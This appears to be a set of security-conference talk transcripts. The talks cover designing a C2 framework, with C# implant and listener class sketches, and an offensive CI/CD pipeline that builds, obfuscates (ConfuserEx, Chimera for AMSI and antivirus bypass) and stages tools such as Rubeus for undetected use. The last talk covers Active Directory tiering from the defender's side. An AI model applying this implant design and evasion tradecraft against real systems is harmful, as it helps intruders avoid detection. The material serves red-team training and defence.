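    public string[] Arguments { get; set; }
    public byte[] Artifact { get; set; }    // e.g. the assembly for an execute-assembly task
}

// Team server -> implant: the server copies the request and adds its own tracking GUID.
public class ImplantTask
{
    public Guid TaskGuid { get; set; }      // added server-side, never supplied by the operator
    public string Command { get; set; }
    public string[] Arguments { get; set; }
    public byte[] Artifact { get; set; }

    public static ImplantTask FromRequest(OperatorTaskRequest request) => new ImplantTask
    {
        TaskGuid = Guid.NewGuid(),
        Command = request.Command,
        Arguments = request.Arguments,
        Artifact = request.Artifact
    };
}

// Implant -> team server -> operator: only status and output travel back, not the artifact.
public class TaskResult
{
    public Guid TaskGuid { get; set; }
    public string Status { get; set; }      // e.g. "Pending", "Running", "Complete"
    public string Output { get; set; }
}
```

The design point is exactly the one made above: storage attributes, transport details, and operator-facing fields never leak across the hops, because each hop has its own model.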
So you're going to push, say, Rubeus down to your implant and tell it to execute with these arguments. The server will then add on that task GUID and give me back that GUID, so as the operator I can use it to check the status of that task. And when I'm asking for that, I don't necessarily want all of the original data back; I don't need the whole assembly coming back, I don't need Rubeus going backwards and forwards on the wire between me and the server. All I really want is the result and the status. You'll also find that if you're using something like Entity Framework for storage, you have to decorate your classes with all sorts of things, attributes on your properties that define the primary keys and so on, and that information just doesn't need to come back to the operator or go to the implant. So at every point you want to translate each model into a different model and pass it along the chain. There's also the template method pattern, and this is pretty good for planning your code more carefully, what your actual code is going to look like. I'm sorry that all of my code examples are in C#, mainly because that's all I really know, but also because that's what people seem most interested in. On the left I've got an abstract class that's going to act as a building block for building custom listeners on my server. I've got a protected field at the top, which is an ITaskManager; that's an interface with these methods on it. QueueTask is the method an operator would use to task an agent, so it takes in a GUID and, here, a byte array, though this would really be the implant task model. GetTasks and ReceiveOutput are used on the listener side, so that when an implant is talking to the listener, the listener can use the task manager to grab any tasks queued for that implant and to give the server any output the implant is sending. Then the listener just has this Init, or initialize, method to bring in that task manager, plus Start and Stop. So let's have a look at what that could look like in C#. This is my abstract class: you can see the ITaskManager here, and Init just brings in the task manager and assigns it to that field; then there are two abstract methods, Start and Stop. When somebody comes along and implements their own custom listener, they inherit from this Listener class, and this is the entire class here. It's obviously not very functional, it's just an example, but you can see I've highlighted where it would use the task manager. As the author of a custom listener, you don't have to worry about where the task manager is coming from or how it works; because you've implemented this abstract class, the framework takes care of that for you, and the task manager is simply there as a field for you to use as appropriate. To get tasks you just call GetTasks, and to send any output into the server to be processed you just call ReceiveOutput. So abstraction and interfaces are just so useful.
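Since the slide itself isn't in the transcript, here is a hedged reconstruction of the kind of abstract listener being described; the names and signatures are illustrative guesses, not the speaker's actual code.

```csharp
// Hedged sketch of the template-method-style listener building block.
using System;
using System.Collections.Generic;

public interface ITaskManager
{
    void QueueTask(Guid agentGuid, byte[] task);         // used by the operator-facing side
    IEnumerable<byte[]> GetTasks(Guid agentGuid);        // used by a listener when an implant checks in
    void ReceiveOutput(Guid agentGuid, byte[] output);   // used by a listener to hand results back
}

public abstract class Listener
{
    // Injected by the framework; custom listener authors just use it.
    protected ITaskManager TaskManager { get; private set; }

    public void Init(ITaskManager taskManager)
    {
        TaskManager = taskManager;
    }

    // Custom listeners only have to say how they start and stop.
    public abstract void Start();
    public abstract void Stop();
}

// A deliberately non-functional example, in the spirit of the one on the slide:
// the author worries about the transport, never about where TaskManager comes from.
public class DummyHttpListener : Listener
{
    public override void Start()
    {
        // Bind a web server here; then, on implant check-in:
        //   var tasks = TaskManager.GetTasks(agentGuid);
        //   TaskManager.ReceiveOutput(agentGuid, postedData);
    }

    public override void Stop()
    {
        // Tear the web server down.
    }
}
```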
In terms of any implant you're going to write, base primitives are better, in my view, than what I call command proliferation. You see some C2 tools where you type help and just get a bazillion commands you can execute, and, like me, you might find it a bit overwhelming; it's also not that flexible for the operator. Let's use Mimikatz as an example. You could build a command into your framework that will automatically push Mimikatz down to the implant, load it up in some way, execute it, and send the results back, and you could do the same for Seatbelt and for Rubeus. It's very nice to have an automated way to push all of these assemblies down, but as soon as the operator says, well, I want to push down something custom, you've not made that very easy to do. The base primitives are more about what allows these commands to happen in the first place. Mimikatz is tied to manual mapping, in C# at least, so instead of providing a Mimikatz command you could just provide a means of manual mapping in your implant, which allows the user to send down an arbitrary DLL or executable with arbitrary arguments, map it into the implant, execute it, and send the results back. You can also expose reflective DLLs, .NET reflection, PowerShell, sockets, whatever you want; the more easily you expose these base primitives to your operators, the more easily they can write custom commands for your implant. And in terms of commands, this is something I see quite often, not just in C2 tools but in all sorts of tools that take user input: the command is a string, and there's a switch statement, or it could easily be if-else after if-else: if the command equals this, do this. It's just not good. It's not very flexible, obviously, and it's difficult to expand and maintain; if you want to add another case, the thing becomes massive, and if a branch is more complicated than these, it becomes untenable. It's difficult to handle exceptions: you could wrap the whole thing in a try-catch, in which case you're only catching generic exceptions, or you could wrap each branch in its own try-catch, which makes it even bigger. There's code duplication: we're calling GetCurrentDirectory a whole bunch of times, which isn't a problem for something so short, but for anything more complicated it becomes unmanageable. It's not particularly performant, because an if-else chain always starts checking from the top. We're also forcing everything to be a string. And it's just ugly; this is not a good way to code something. So what's a better example? Again, it's to implement abstracts, as in the sketch below and the walkthrough that follows.
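The walkthrough of this approach continues just below; sketched here ahead of it is a hedged C# reconstruction of the command-class-plus-reflection idea (class names, helpers, and the ImplantTask shape are hypothetical, not the speaker's actual code).

```csharp
// Hedged sketch: replace the giant switch with small command classes discovered via reflection.
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Reflection;

// Minimal task shape, as sketched earlier.
public class ImplantTask
{
    public Guid TaskGuid { get; set; }
    public string Command { get; set; }
    public string[] Arguments { get; set; }
}

public abstract class ImplantCommand
{
    public abstract string Name { get; }                 // e.g. "ls"
    protected Implant Implant { get; private set; }

    public void Init(Implant implant) => Implant = implant;
    public abstract void Execute(ImplantTask task);
}

public class ListDirectoryCommand : ImplantCommand
{
    public override string Name => "ls";

    public override void Execute(ImplantTask task)
    {
        try
        {
            var path = task.Arguments?.FirstOrDefault() ?? Environment.CurrentDirectory;
            var listing = string.Join("\n", Directory.GetFileSystemEntries(path));
            Implant.SendResult(task.TaskGuid, listing);
        }
        catch (Exception e)
        {
            Implant.SendError(task.TaskGuid, e.Message);   // per-command error handling, no outer switch
        }
    }
}

public class Implant
{
    private readonly Dictionary<string, ImplantCommand> _commands =
        new Dictionary<string, ImplantCommand>(StringComparer.OrdinalIgnoreCase);

    // Instantiate every non-abstract ImplantCommand in this assembly once, at start-up.
    public void LoadCommands()
    {
        var types = Assembly.GetExecutingAssembly().GetTypes()
            .Where(t => t.IsSubclassOf(typeof(ImplantCommand)) && !t.IsAbstract);

        foreach (var type in types)
        {
            var command = (ImplantCommand)Activator.CreateInstance(type);
            command.Init(this);
            _commands[command.Name] = command;
        }
    }

    // The replacement for the big switch statement.
    public void HandleTask(ImplantTask task)
    {
        if (_commands.TryGetValue(task.Command, out var command))
            command.Execute(task);
        else
            SendError(task.TaskGuid, $"Command not found: {task.Command}");
    }

    // Transport plumbing deliberately omitted from this sketch.
    public void SendResult(Guid taskGuid, string output) { /* ... */ }
    public void SendError(Guid taskGuid, string error) { /* ... */ }
}
```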
So I've got an abstract class here called ImplantCommand. It has a string property called Command, which I probably should have called Name, but it is the name of the command; it has an abstract method called Execute, which brings in the task that's been sent down; and it has an Init method which brings in a class that, in this case, is called Implant. The Implant class has several public methods, which you can see on the right-hand side, for sending results back, sending an error back, and so on. So the Implant class itself isn't something the command author really has to care about, but it exposes public methods for them to do useful things. Like the listener example, when we want to create our own command we inherit from ImplantCommand and give it a name, in this case just ls. I've also thrown SharpSploit in here as an example of decoupling a lot of the back-end execution from the actual command, which means that if someone wants to implement another command that uses SharpSploit, they can do that really easily; again, we're just making it as flexible as we can. And of course, with abstracts you are forced to provide an implementation when you override the method, and as the author you can put whatever you want in there. You don't have to worry about the task, it's automatically brought into the command for you, and you don't have to worry about where the implant comes from, that's automatically done too; you just call the methods you want. Then, within that Implant class, at some point we call LoadCommands, and we can use reflection to automatically instantiate every type of ImplantCommand and initialize them so they're ready to be used. And the HandleTask method, which in the previous example was that big old switch-case, now looks like this: all we need to do is find the class that has the name we're looking for in the task that comes down; if we didn't find it, we send back an error saying the command isn't found, and otherwise we just execute it. I've got another example here using attributes, but I'm running out of time, so I'll skip to the summary. To start with, absolutely know your goals: know what you're trying to build and why you're trying to build it. Only by knowing your goals will you really understand what features you need to put into your framework. I'd also encourage you to focus on framework features rather than C2 features; by C2 features I guess I'm referring to command proliferation again, but especially in the early days of your framework, focus on those framework elements. You really want to provide the operators with the means to customize and expand your framework the way they want to. Prioritize those base primitives on your implant and provide an easy means for operators to interact with them. Abstracts and interfaces are incredibly useful; I can't think of a better way to provide that extensibility to the operators. Plan small, attainable releases; don't try to do a big-bang release for your first one. And if this is something you want to maintain over the long term, I would also say to limit each release to only one big feature. If you look at release notes for software, the vast majority of the changes are usually bug fixes, then other minor improvements, and you'll probably only see one, maybe two, big new features. That's a software development lifecycle habit I'd really encourage: don't try to change too much in one go. Yeah, I think that's pretty much it. I hope the talk was useful; if you've got any questions, please let me know.
I'm going to try and be around for a Q&A during the village. If not, feel free to hit me up on any of those socials I shared at the beginning. I hope you enjoy the rest of the conference. Thanks very much.
Over recent years, there has been a huge boom in open-source C2 frameworks hitting the information security space. So much so that they made a website and a logo - that's how you know things are serious! Such a trend naturally drives more people towards taking on the gauntlet, but all too often it becomes an insurmountable challenge and another dashed dream of the aspiring red teamer and veteran alike. Believe me when I say: I've been there. I've felt the pain, the frustration, the imposter syndrome. Heck, I still do. However, I've (mostly) come out the other side with some hard-learned lessons. Those lessons are the subject of this talk. The goal is not to write or provide code. We shall discuss how to approach initial design ideas; decide what is important and what is not; anticipate and deal with potential problem areas; consider different use cases and perspectives; and more. If you are interested in building your own C2 framework, contributing to existing frameworks, or even software development in general, there's something in this talk for you.
10.5446/54341 (DOI)
Hello everyone, and thank you for joining my talk. My name is Gil Beton, and today I'm going to talk about red team challenges. I will also demonstrate how we tackled these challenges in our team, and enable you to do so in yours. Before we dive in, a bit about myself: I'm originally from Israel but currently based in Singapore. Hacking was always part of my life, always trying to figure out how to utilize technology and science to make my life easier. I have over five years of experience in the cybersecurity industry, where I started from application penetration tests, moved through infrastructure engagements, and on to red teaming. My expertise lies around enterprise security and its related aspects. Today I work at Signia Consulting as an offensive security engineer, as part of its security research team. I am available on many social networks, which I've listed here, so feel free to reach out. First, let me give you some context. We have to admit it: red and purple teaming became harder. Throughout the past years, red teamers have been struggling with challenges during engagements, because organizations lifted up their detection capabilities and integrated advanced security solutions. This caused the execution of even basic red team tasks to get complicated. Organizations also have a variety of products and vendors incorporated in their networks, which makes techniques that worked in one organization fail, or get detected, in another. Logging and monitoring capabilities were also enhanced: we are recorded 24/7 by the Big Brother team and its SOC siblings, so avoiding triggering alerts during an operation became a challenge by itself. To handle the situation, adversaries spend even more time on the weaponization phase, both prior to and during the operation. Many times these tasks are repetitive, and sometimes they cause delays due to technical issues, and those technical issues we have all experienced before. Let me ask you a question: how many times have you weaponized the same tool? Or how many times have you helped a colleague to use a technique that you found or used? Speaking about colleagues: while working with a growing team that is divided across multiple engagements, we realized that new challenges were added. These include working from home due to the COVID era, and back-to-back engagements, so new developments that team members created got lost as soon as they finished their engagements. We understood that we wanted a better platform to collaborate on. In my opinion, having a base standard can enable equal capabilities across your team members. Now, whenever we develop or discover a new capability, we have to somehow store it, right? There are many recommendations and methodologies out there, and every day a new exploit, technique, or tool is released, so sometimes it's hard to follow and incorporate every technique into your methodology while being busy with multiple engagements. Security teams also share thoughts during hallway conversations or coffee breaks, but memorizing and storing all this content in an efficient way became complicated. So until Elon Musk provides us with his Neuralink, we have to find another solution. We understood that we want to bring more automation into our engagements, as we want to reduce the time spent on repetitive tasks we are not really interested in, and we know that the community has already adopted the CI/CD pipelines concept to automate tasks related to offensive tool weaponization.
Offensive CI/CD pipelines have been around for a couple of years, with the goal of helping red teams automate their tasks. I'm not going to talk in detail about CI/CD itself, but we are going to dive into the advantages of using it for offensive needs. I truly believe that we cannot automate the entire red team operation, as we need to bring our own expertise, knowledge, and way of thinking; we want a mind behind the operation who can take decisions in real time according to the feedback received. Then you can put more focus on bypassing the new barriers you have never tackled before. We started exploring the CI/CD area and performed research that ended up with a pain we really wanted to solve. This pain pushed us to design and develop our own offensive pipeline framework, focusing on the needs of our growing adversarial team. Such needs include simplicity: as a growing team, we wanted to onboard new members to this concept easily, and make it even simpler for ourselves so the migration would be faster. There is also a need for modularity: the framework must allow the developed techniques to be packaged individually, so we can mix between them when assembling pipelines that weaponize different tools. We wanted the framework to be able to maintain itself, so we don't add overhead by maintaining it ourselves. We were looking for a system that anyone can contribute to, so the efforts of each and every team member are pooled; we all have many engagements, and any team member solving a complex challenge can share the solution back into the offensive pipeline framework. We also wanted the environment's infrastructure to be controlled by us, since the sources and tools we are trying to weaponize are considered malicious and we don't want them to get analyzed or blocked; having these frameworks on a SaaS solution could therefore create obstacles along the way. Also, while performing a red team engagement, you sometimes need a specific tool that can help you achieve your goal, and we all know that delays during an operation can cost us the operation. We also have to remember that each engagement gets different artifacts, so other engagements are not affected if one engagement's infrastructure and collection of tools lose their reputation. Considering all these needs, we ended up choosing GitLab as the core of our framework. Looking at the high-level description, you might predict that it can answer our needs, so let me explain why. We researched a variety of frameworks such as Jenkins, CircleCI, GitHub Actions, and AppVeyor, which served us for the past year and taught us the power of having CI/CD concepts within your security workflows. These tools didn't really match our needs, and even GitLab was not perfect; I actually started going over its source code when I saw a possible constraint. But a high-level description is just words, so let's discuss the technical aspects. GitLab started off as a code repository and version control system, allowing you to store and manage the sources of your tools. GitLab also provides a RESTful API, which allows you to automate anything you can do manually, together with detailed documentation that can save you time when you try to figure out how to approach something. A must-have feature is GitLab CI, which provides the ability to create pipeline jobs, which I refer to as recipes, in a simple and organized manner through YAML files.
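As a hedged illustration of the point about automating things over the REST API: triggering a project's pipeline with GitLab's pipeline-trigger endpoint could look roughly like this from C#. The URL, project ID, and token are placeholders, and this is only a sketch, not part of any particular framework.

```csharp
// Minimal sketch: trigger a GitLab pipeline via the REST API.
// Endpoint: POST /api/v4/projects/:id/trigger/pipeline with a trigger token and a ref.
using System;
using System.Collections.Generic;
using System.Net.Http;
using System.Threading.Tasks;

public static class PipelineTrigger
{
    public static async Task<string> TriggerAsync(
        string gitlabUrl, int projectId, string triggerToken, string gitRef = "main")
    {
        using var client = new HttpClient();

        var form = new FormUrlEncodedContent(new Dictionary<string, string>
        {
            ["token"] = triggerToken,   // a pipeline trigger token created in the project settings
            ["ref"] = gitRef            // branch or tag to run the pipeline against
        });

        var response = await client.PostAsync(
            $"{gitlabUrl}/api/v4/projects/{projectId}/trigger/pipeline", form);

        response.EnsureSuccessStatusCode();
        return await response.Content.ReadAsStringAsync();   // JSON describing the new pipeline
    }
}

// Example usage (placeholder values):
//   var json = await PipelineTrigger.TriggerAsync("https://gitlab.example.local", 42, "TRIGGER_TOKEN");
```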
GitLab CI also offers multiple integrations with different systems where you can execute your job recipes. For example, as part of the CI concept you need to execute your jobs on an operating system, either Linux or Windows, on a single server or in a container, and having support for Docker and Kubernetes can help you achieve that faster. Jobs can also be executed on specified conditions, for example on a push you just made to your repository, whenever another pipeline has ended successfully, or when triggered by another pipeline. The multi-pipeline support allows you to trigger several pipelines by executing only one: for example, when we perform a red team we tend to use a collection of tools, and we don't want to weaponize them one by one; we want to trigger one pipeline that delivers all of them. I believe this is just the tip of the iceberg, and I'm pretty sure you'll find additional features to use in the future. Let's see a simple example of an offensive pipeline recipe in motion. The pipeline starts off cloning the Rubeus tool, a C# tool, from the code repository. Then the tool gets built using a job that we defined, containing MSBuild and its dependencies. The compiled binary passes to the next stage, where it gets obfuscated using ConfuserEx. The obfuscated binary then passes to the next stage, where it gets wrapped by a .NET assembly loader, letting us execute the .NET tool via PowerShell. Finally, it gets deployed to your favorite bucket, so you can download it from anywhere you want; in addition, we also deploy it here to our pwndrop server, which is a server that allows you to manage the way you download your files. Another example uses PowerShell, with the tool Invoke-DomainPasswordSpray. This time we don't need to build it, just aggregate it from a few PowerShell scripts. The combined PowerShell script then passes to the next stage, where it gets obfuscated with Chimera, a tool designed to bypass AMSI and antivirus when obfuscating PowerShell scripts, and then it goes directly to the last stage, where it gets deployed to our pwndrop server so we'll be able to download and execute it in the targeted environment. In the same way, we can add additional sources for different tools and define their pipelines with jobs we have already developed; this is where the modularity plays its significant role. For dessert, we can use the pipeline-triggering options, or the GitLab API, to trigger multiple pipelines based on different groupings. This enables us to weaponize tens and hundreds of tools in minutes. Today, I want to introduce Scalops. Scalops is a framework that empowers red teams by enabling them to put more focus on what they need to do instead of how to do it, which is achieved by designing great recipes. Let's dive in to see the possibilities of this framework. After we authenticate to our GitLab, we can see that it contains a few repositories. The first one is CI Recipes, a collection of all the YAML files that contain the jobs we use to weaponize our tools. The three other repositories are tools that we want to weaponize. Now, let's say we want to add an additional tool, in this case SharpEDRChecker. What we're going to do is enter the CI Recipes repository and add the relevant definitions for the SharpEDRChecker tool; this time we will use the Web IDE, which is very useful here.
You will see a few sections within this repository. The relevant section for the tools is the tools controller, where you can see the recipes of the different tools we want to weaponize. The tools index contains all the tools that are imported into the GitLab instance. To add the additional tool, we create another object within this array and provide it with the SharpEDRChecker Git repository link. We also specify the name of the project so the automation can distinguish it from the other projects, and we create a recipe for it so its weaponization can be automated. Because its recipe does not exist yet, we create it as a new file. Since SharpEDRChecker is a C# tool that is built and structured the same way as Rubeus, we can actually copy the same recipe and change the relevant names. We just have to remember which stages we are going to execute — in this case build, obfuscate and deploy — and all the relevant jobs are already included in the YAMLs above. Now, when we commit the tools index we actually trigger a pipeline that automatically imports the tool. You can see that the pipeline was triggered below and a job was created. We let the job do its work and look at how we designed it. Under CI-maintain we included many things that maintain the framework and the infrastructure itself. In tools import we have the import public tools job: it reads the tools index file, compares it with the projects already existing in our GitLab instance, and imports the leftover tools. As you can see, the job succeeded; we also have the API output here, and SharpEDRChecker was added to our projects list. Let's trigger its pipeline and see what happens. If you remember, we pointed it at the build, obfuscate and deploy stages, so there are three stages with one job in each. Let's go over every job. The build job can be found under CI builders in sharptools.yaml. Here we use a customized Windows container that we created to contain MSBuild and all the dependencies needed to build C# tools; it compiles the tool with the Release configuration and uploads the result as a job artifact so the next job can pick it up. The next stage is obfuscation with ConfuserEx, under CI obfuscators. ConfuserEx also runs on a customized container we created for it: it starts off fetching the artifact from the previous job, runs ConfuserEx to obfuscate the compiled binary, and uploads the obfuscated binary as a job artifact for the next job. The last job is deploy to pwndrop, under CI deployers. It runs on a Linux container — notice that we are weaponizing our tool across two different operating systems with different dependencies, and it all happens in no time. To deploy to pwndrop we have to give this job the variables it needs to reach the server and upload files with the right access; since we did not provide those variables, this job will fail. Let's leave it there and take a look at the multi-pipeline feature. This is also part of CI recipes, and we want to build and trigger the pipelines of the three repositories we had.
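As a rough illustration of the import job just described — not the framework's actual code — the logic comes down to diffing the tools index against the projects already present and creating whatever is missing via the GitLab Projects API. The URL, token and index file format are invented for the example, and pagination is deliberately ignored.

```python
# Sketch of an "import public tools" job: read a tools index, compare it with the
# projects already in the GitLab instance, and import the leftovers.
import json
import requests

GITLAB = "https://gitlab.example.local"
HEADERS = {"PRIVATE-TOKEN": "<api-token>"}


def existing_project_names():
    """Names of projects already present (first page only, for brevity)."""
    resp = requests.get(f"{GITLAB}/api/v4/projects", headers=HEADERS,
                        params={"per_page": 100, "simple": True}, verify=False)
    resp.raise_for_status()
    return {project["name"] for project in resp.json()}


def import_missing_tools(index_path="tools-index.json"):
    """Create a project with import_url for every tool not yet in the instance."""
    with open(index_path) as handle:
        # e.g. [{"name": "SharpEDRChecker", "url": "https://github.com/..."}]
        tools = json.load(handle)
    present = existing_project_names()
    for tool in tools:
        if tool["name"] in present:
            continue
        resp = requests.post(f"{GITLAB}/api/v4/projects", headers=HEADERS,
                             data={"name": tool["name"], "import_url": tool["url"]},
                             verify=False)
        resp.raise_for_status()
        print(f"imported {tool['name']} from {tool['url']}")


if __name__ == "__main__":
    import_missing_tools()
```

Running something like this whenever the tools index is committed is what gives the "commit it and it appears" behaviour shown in the demo.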
We already made a YAML file under the CI multi-pipeline folder with three jobs that each trigger the pipeline of one of the other repositories. The condition for executing these jobs is that you supply the CI multi-trigger variable together with the relevant value; that way we can tag different groups of tools and trigger their pipelines together in an efficient way. Let's execute the pipeline of CI recipes and choose the relevant pipeline. As you can see, we have the CI multi-trigger variable here, which executes multiple pipelines. We want to execute all of them, and they all carry the "all" term. Since we want to deploy them to our pwndrop server, we also have to provide its URL and its write key; we copy those in as variables. The write key can be extracted from this green button — don't enter the whole thing, just take the write key. Now we run the pipeline and see that the pipelines of the relevant repositories were triggered directly from here: PowerUpSQL was triggered, Rubeus, and also Godi — tools written in three different languages, which is exactly what we wanted to show you. Rubeus passes through build, obfuscate and deploy, just as we did with SharpEDRChecker because we copied that recipe; PowerUpSQL goes through Chimera and deployment; and Godi just gets built and deployed. Now we wait for the pipelines to finish to see what happened. Green indicates that everything completed successfully. Let's take a look at the output of the PowerUpSQL jobs so we can understand what really happened: we see a lot of obfuscation values here, and we see that it also uploaded the artifact for the next job. In the pwndrop deploy job we can see that it succeeded, and we can also see the response from pwndrop, which means all the files we just created across the pipelines should be deployed right there. Let's download the Chimera output and take a look at the file: all the strings look obfuscated and randomized, even the function names, so it looks very useful. The last thing I wanted to show you is the Dockerfiles. We store our customized Dockerfiles in the maintain folder, where a job can pick them up and build them on top of another container. This is only supported for Linux and is handled through a Google project named Kaniko. We can take a Dockerfile and build it through our pipeline, managing all the infrastructure of this framework as code. You can see that we have a special variable to trigger that kind of pipeline: if we trigger the CI recipes pipeline, we can provide the name of the Dockerfiles we want to build and push — the Dockerfile-build-Linux variable — and we enter the prefix of the Dockerfile we actually want to build and push. As you can see, a new job named build Linux container was created; it can be found under CI container builders, where it uses the Kaniko project and eventually pushes the container to our private container registry. Great — I hope you enjoyed the demo. After all this magic, let's understand the infrastructure running behind the scenes of this framework. We start off with the GitLab instance, which comes with the built-in CI/CD. To execute our jobs we use a Kubernetes cluster with two different node pools.
One node pool executes the Linux-related jobs and the other one executes the Windows-related jobs. For the Kubernetes cluster to communicate with the GitLab instance, GitLab provides the GitLab Runner, a Helm deployment you install into your Kubernetes cluster that acts as a proxy between the GitLab instance and the cluster: it receives jobs from the GitLab instance and instructs the Kubernetes cluster how to execute them. We created a second GitLab Runner deployment that is responsible for the Windows-related jobs. Our Kubernetes cluster is connected to our container registry, where we store the custom containers used during operations and pipeline execution. Having this framework on-prem is nice, but we can also shift it to the cloud — in this example using Google Cloud resources to host it. Here we created a Kubernetes Engine cluster together with Google Container Registry, which work well together, and attached a service account with the relevant permissions to push and pull containers. The Kubernetes Engine cluster and the GitLab instance communicate internally because they sit on the same VPC. We also added Google Cloud Storage so we can store utilities we need during our pipelines, and we created a firewall so we can operate the framework — and actually enjoy it — without exposing it to the whole internet. Everything sits in a single GCP project, so we can maintain it in one place, and GitLab can then import tools from remote Git repositories. As part of the Scalops framework we are releasing a Terraform script that lets you deploy the exact same environment in your own cloud, complete with the built-in recipes we showed before. All you need is a GCP subscription and a web browser; refer to the project's repository and follow the instructions. A few words about cloud cost. We can divide it into idle cost and per-job cost, because we want the framework to be waiting for us when we want to run pipelines, but we are not continuously running pipelines. Two instances need to stay up, and they consume most of the credit. On top of that there is per-job cost whenever new nodes get provisioned, and this part is tricky: you may provision one node for one job, which translates into one pod, but if you create ten jobs simultaneously they will share that same credit. Unless you plan to supply weaponized tools to the whole world community, the bottom line is that you will pay less than 100 US dollars a month to use this framework. An additional thought that came out of creating the framework and this presentation is that it can become a community-driven framework. We just released the infrastructure code and the CI recipes repository itself, allowing people to collaborate and share their techniques in one place where anyone can benefit — the same way people share Cobalt Strike Aggressor scripts today. There is another problem that will come up after using this framework: you will speed up the tasks you perform during red team engagements and find yourself collecting all the enumeration and reconnaissance information in no time, so you will then have to figure out how to process all that data.
Also, if your team really decides to use this framework in an efficient way, you may end up with an operator executing a task that bypassed several defensive security tools without the operator even knowing how they were bypassed. I'm not advocating not knowing what you are doing, but it is something that can happen, and it may enable additional people to perform adversary simulations and red teams. I'm sure the question about command and control came to your mind as well: we are not planning to replace C2 frameworks with offensive pipelines — we have to use them together. C2 frameworks are heavily monitored by detection and prevention security tools, and they do not get updates that often, so you may find yourself on an old version of some tool, trying to figure out how to load a new one. With offensive pipelines you can grab your beacon, agent or grunt from your favorite command and control, run your obfuscation and evasion techniques on it, send it to a hosting server, and then download and execute it in the targeted environment without getting detected. I also listed the references to the technologies this framework leans on, so you can go ahead and extend your knowledge about every byte and bit that went into it. I want to thank everyone who took part in designing this framework and everyone who helped me prepare this presentation — thank you very much, and thank you for staying with me until now. I hope you enjoyed the talk and that you will consider adopting CI/CD concepts into your red teams. I will be taking your questions, feedback and comments on the Discord server. See you there. Bye bye!
Evolving endpoint protection software with enhanced detection capabilities and greater visibility coverage has been taking red team and purple team operations' complexity to a higher level. The current situation forces adversaries to take precautions and invest much more time in the weaponization phase to overcome prevention and detection mechanisms. The community has adapted CI/CD pipelines to automate tasks related to offensive tool weaponization. Offensive CI/CD pipelines have been around for a couple of years, with the goal of helping red teams automate offensive tool creation and the implementation of evasion techniques. As part of this evolution, we designed and built our own offensive CI/CD pipeline framework that is simple to use, modular, self-managed, automated, collaborative, and fast. Our framework leverages Infrastructure as Code (IaC) to fully automate the deployment of our offensive CI/CD pipeline framework with built-in recipes for evading host and network detections. Each recipe is modular and can be customized to fit red team or purple team requirements, such as proprietary techniques or imitation of specific threat actor TTPs. The framework leverages GitLab CI/CD in conjunction with a Kubernetes cluster to automate and manage the process of building and deploying offensive tools at scale. In this talk, we will discuss the essentials of offensive pipelines and present our innovative approach, while referring to the challenges we solved, and demonstrate how you can leverage our offensive CI/CD framework to empower red team and purple team operations.
10.5446/54342 (DOI)
Hi, my name is Jonas and I'm going to present a tool I've made called ImproHound. It's a tool for finding attack paths in Active Directory that break the tier model, using BloodHound. First I will talk a little bit about myself so you get to know me better, then about Active Directory security and how you can find attack paths using the awesome tool BloodHound. Then I will talk about the Active Directory tier model and how you can find tier-breaking attack paths using ImproHound. Finally, I would like to cover what ImproHound cannot do — what you still have to find manually. So again, my name is Jonas and I work for a small company in Denmark called Improsec. I work primarily with Active Directory security: I do assessments where I help clients find security holes in their Active Directory configuration and attack paths that could lead a non-privileged user to domain admin access. What I do most of the time, though, is help clients fix these problems and implement security measures like tiering. I've only been in the industry for two years, so I'm definitely not as experienced as some of the other speakers, but I hope I will still be able to entertain you for the next 25 minutes or so. Active Directory is an old system, from around the year 2000. Really many vulnerabilities have been found over the years, and many of them Microsoft has not been able to patch, because the problems are part of the fundamental protocols and systems — it's not something you can patch. One big problem in such old systems is that if two users log into the same computer, one user can steal the other user's credentials from memory: credential stealing. Another big problem in Active Directory is control drift, by which I mean the permissions configured in the ACLs of the Active Directory, because in large environments there are so many permissions configured that it is very difficult to get an overview of them all and of their implications. Credential stealing and control drift are the two main security problems I will focus on in this presentation. To make matters even worse for the sysadmins and defenders, it's actually quite easy to find and chain these misconfigurations and vulnerabilities, because you can use the awesome BloodHound to identify the attack paths for you. What BloodHound does is collect a lot of data from the AD, put it into a graph database, and then let you find the shortest path from a compromised user to a given target. In the example I have in the slides it's a user called KR and a long attack path to the Domain Admins group; it would have taken hours to find this attack path manually, so BloodHound can really help attackers with that. So what can defenders do to try to prevent these domain takeovers? Microsoft has recommended implementing the tier model, which means you divide the AD into three tiers. You have tier 0, the most important servers: domain controllers, PKI, ADFS and other systems that allow one to take over the rest of the domain. Then you have tier 1, the normal servers, and tier 2, the workstations and devices that the regular users of the company interact with.
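To give a feel for what that shortest-path lookup looks like under the hood, here is a minimal sketch against the Neo4j database that BloodHound fills. This is not ImproHound code; the connection details, the user name and the domain are placeholders.

```python
# Sketch: ask the BloodHound Neo4j database for the shortest attack path from a
# compromised user to Domain Admins. Connection details and names are placeholders.
from neo4j import GraphDatabase

driver = GraphDatabase.driver("bolt://localhost:7687", auth=("neo4j", "bloodhound"))

QUERY = """
MATCH p = shortestPath((u:User {name: $user})-[*1..]->(g:Group {name: $group}))
RETURN [n IN nodes(p) | n.name] AS hops, length(p) AS steps
"""

with driver.session() as session:
    record = session.run(QUERY,
                         user="KR@CONTOSO.LOCAL",
                         group="DOMAIN ADMINS@CONTOSO.LOCAL").single()
    if record:
        print(" -> ".join(record["hops"]), f"({record['steps']} steps)")
    else:
        print("No path found")
driver.close()
```

The BloodHound GUI runs this kind of Cypher for you; the point is that the raw graph database is easy to query directly, which is exactly what ImproHound builds on.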
And the idea is that if an attacker, for example, gets a shell in tier 1, the attacker should not be able to compromise anything in tier 0 — at least not using credential stealing or by abusing permissions set in ACLs in the AD. So what does it mean to implement tiering in an environment? It means implementing logon restrictions and control restrictions. The logon restrictions protect against credential stealing: you create separate accounts for each tier. Say you have a sysadmin who needs to manage systems across all three tiers; that person gets a separate account for each tier, and their tier 0 domain admin account is only allowed to log into tier 0 systems. That way the credentials of that account never exist in tier 1 or tier 2, and attackers cannot steal the domain admin's credentials in any tier other than tier 0. Microsoft suggests that you could allow tier 1 users to log into tier 0 — that would be this arrow here on the slide. If you ask me, that is a really bad idea, because then you have tier 1 users and tier 0 users logging into the same system, and you have a vulnerability again. So you shouldn't allow that, and of course the same principle holds for tier 2 and tier 1. The control restrictions protect against abusing ACL permissions: AD objects that belong to tier 0 are allowed to have permissions on AD objects in every tier — the green and yellow arrows on the slide — though of course only as required by their role. But there is no way a tier 1 admin, computer, group or GPO should have any permissions on tier 0 objects, and again the same goes for tier 2 towards tier 1.
